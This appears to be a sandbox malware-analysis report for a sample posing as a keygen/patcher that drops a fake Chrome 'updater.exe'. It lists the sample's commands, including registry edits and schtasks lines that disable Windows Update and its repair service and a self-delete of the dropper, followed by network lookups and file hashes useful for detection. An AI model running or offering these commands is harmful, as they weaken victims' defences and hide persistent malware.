reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\patcher.exe"
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.140.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 13.107.253.64:443 | tcp | |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| GB | 172.217.169.74:443 | tcp | |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 105.193.132.51.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\keygen.exe
| MD5 | eefac124a0e2761c1dcbf7924711e5f1 |
| SHA1 | 9fd030c73442f552c0fc88afaab0b976ea4dccee |
| SHA256 | ea2dd455c7a34b3c742bce0aa7805718fe2d20a84462598f5ebe7d721737166c |
| SHA512 | ff5d4e06574883c0a7eda29226d37a702e384cd0008eca6e3745eb30ac9fcb9db7cd50adddcf9014f04a23e32f24903484d9a94b15f865feb2a2fa68fa7d8e56 |
C:\Users\Admin\AppData\Local\Temp\patcher.exe
| MD5 | 51ffe38c27bf1db8ff1fc599cc029fc2 |
| SHA1 | a8a0efc1937edf30037416f620effbcd4f64dc39 |
| SHA256 | ad22b62fa803e88e5ae79957d8e7f196bc221656e4718ec2d2cf4993143c81aa |
| SHA512 | 50e3346ea6b0cd099ff97e362221eddb8b090f422efe504550fdd21d981e738a54f045bd28a7a825d8443d9e826f3fc5acaaabad221cc1331507730cbf265709 |
C:\Users\Admin\AppData\Local\Temp\patcher.exe
| MD5 | 01b41cf56c39bab0a70b406512ba1e95 |
| SHA1 | 20a7179e6d375af4390e85a8c0ff972a9311873b |
| SHA256 | 5e298e4c33ba67e58933c972782756b06591f2ffad5ff849d44a786cc38c0056 |
| SHA512 | 1d30e4db136fd03d819c6ed11b8246fc30b13e6f65feca29e85591f6ceae88adee9c049f58ed84466698b69b6df196e60cd935034475a04296ea2ba07e12c8c8 |
memory/4732-8-0x0000000002370000-0x0000000002371000-memory.dmp
memory/2040-9-0x0000000074EF0000-0x00000000756A0000-memory.dmp
memory/2040-10-0x00000000025F0000-0x0000000002600000-memory.dmp
memory/2040-11-0x00000000024F0000-0x0000000002526000-memory.dmp
memory/2040-12-0x0000000004CF0000-0x0000000005318000-memory.dmp
memory/2040-13-0x0000000004B00000-0x0000000004B22000-memory.dmp
memory/2040-14-0x0000000005490000-0x00000000054F6000-memory.dmp
memory/2040-15-0x0000000005500000-0x0000000005566000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qcwqnozc.pz4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2040-21-0x0000000005570000-0x00000000058C4000-memory.dmp
memory/4732-26-0x0000000000400000-0x00000000005B4000-memory.dmp
memory/2040-27-0x0000000005B20000-0x0000000005B3E000-memory.dmp
memory/2040-28-0x0000000005BE0000-0x0000000005C2C000-memory.dmp
memory/2040-29-0x00000000025F0000-0x0000000002600000-memory.dmp
memory/2040-30-0x000000007EFC0000-0x000000007EFD0000-memory.dmp
memory/2040-31-0x0000000006130000-0x0000000006162000-memory.dmp
memory/2040-32-0x0000000070700000-0x000000007074C000-memory.dmp
memory/2040-42-0x0000000006110000-0x000000000612E000-memory.dmp
memory/2040-43-0x0000000006D60000-0x0000000006E03000-memory.dmp
memory/2040-44-0x0000000007510000-0x0000000007B8A000-memory.dmp
memory/2040-45-0x0000000006E90000-0x0000000006EAA000-memory.dmp
memory/2040-46-0x0000000006EE0000-0x0000000006EEA000-memory.dmp
memory/2040-48-0x0000000007100000-0x0000000007196000-memory.dmp
memory/2040-49-0x0000000007070000-0x0000000007081000-memory.dmp
memory/2040-50-0x00000000070B0000-0x00000000070BE000-memory.dmp
memory/4732-51-0x0000000002370000-0x0000000002371000-memory.dmp
memory/2040-52-0x00000000070C0000-0x00000000070D4000-memory.dmp
memory/2040-53-0x00000000071A0000-0x00000000071BA000-memory.dmp
memory/2040-54-0x00000000070F0000-0x00000000070F8000-memory.dmp
memory/2040-57-0x0000000074EF0000-0x00000000756A0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
memory/4808-59-0x0000000074EF0000-0x00000000756A0000-memory.dmp
memory/4808-60-0x0000000004D10000-0x0000000004D20000-memory.dmp
memory/4808-61-0x0000000004D10000-0x0000000004D20000-memory.dmp
memory/4808-62-0x0000000005AF0000-0x0000000005E44000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f838d941455c80ca6d87991fc177d72f |
| SHA1 | e8ab41c828bb6699d96e36a487eb0f9788bd5425 |
| SHA256 | 81e0ff9dec6a38fcf7012ce01cf823b0802afe3dd1724f97856999dda374d15c |
| SHA512 | 6f7f5d336af7e4d48ca2415c10f9bf9268304a25a25e398587db0d51fae5a29434f16ec623118a360e4aee47c23653cc434a3c1a415ba02eed355287c658ec61 |
memory/4808-73-0x0000000004D10000-0x0000000004D20000-memory.dmp
memory/4808-74-0x0000000070700000-0x000000007074C000-memory.dmp
memory/4808-85-0x0000000074EF0000-0x00000000756A0000-memory.dmp
memory/3732-91-0x000001A9149D0000-0x000001A914C20000-memory.dmp
memory/3732-93-0x000001A92F4F0000-0x000001A92F740000-memory.dmp
memory/3732-94-0x00007FFC3B380000-0x00007FFC3BE41000-memory.dmp
memory/3732-95-0x000001A916BC0000-0x000001A916BD0000-memory.dmp
memory/3732-96-0x000001A916BC0000-0x000001A916BD0000-memory.dmp
memory/3116-97-0x00007FFC3B380000-0x00007FFC3BE41000-memory.dmp
memory/3116-105-0x00000126DB000000-0x00000126DB022000-memory.dmp
memory/3116-103-0x00000126C2D40000-0x00000126C2D50000-memory.dmp
memory/3116-106-0x00000126C2D40000-0x00000126C2D50000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | fb570355565a04828ff353aa8ed71dfb |
| SHA1 | 11023aadac0edba98b727ea28a73e6deff99d281 |
| SHA256 | 23479438e94e25a1402e9c6506eb87931d11718587ed1b5922bdaf97620f25b7 |
| SHA512 | b8e6a93d550f48588a3519e9cdbcca0a1acebcc45d70dd3b364dc36fd51b5780b37157b017311a6b48ec469509abbd1a54db2d290e1ba84833f73cd68cd74233 |
memory/3116-113-0x00007FFC3B380000-0x00007FFC3BE41000-memory.dmp
memory/3732-117-0x00007FFC3B380000-0x00007FFC3BE41000-memory.dmp
C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
| MD5 | bc4f5c97c22c0b0209534351cd2ea10d |
| SHA1 | 3c0f69f8f8104d0aab0c88494b90c31f2e66b733 |
| SHA256 | f0b4a0b22f9bd061e6c13bbde3c576f1799fb083d1aec4b02740e6fce6d5ba25 |
| SHA512 | 1e68deea126b4aaf57ff50640116fa3c2be0da75b7085d952c16a83eff803903295f54a524cfb96b08574c64fdf1202662811e1e1f41e777b885e0811059b1d2 |
C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
| MD5 | 36c47334298117fae0d37a5f94b5e975 |
| SHA1 | 4c1fedbf9f07ca9b769499dfea191c27e2466893 |
| SHA256 | e8149fbc4474acbda1950ed0a4d57309e233d78a0a7ca94df24beb5e3703610e |
| SHA512 | fc1603efbca21ec24071622e8c9f6bb0dbc74329aa0a1f2aac80179a181e5cc19c96952ea1cd31dfc70e81f4b17382218bc8134f5f483e5f7de49c03c4506145 |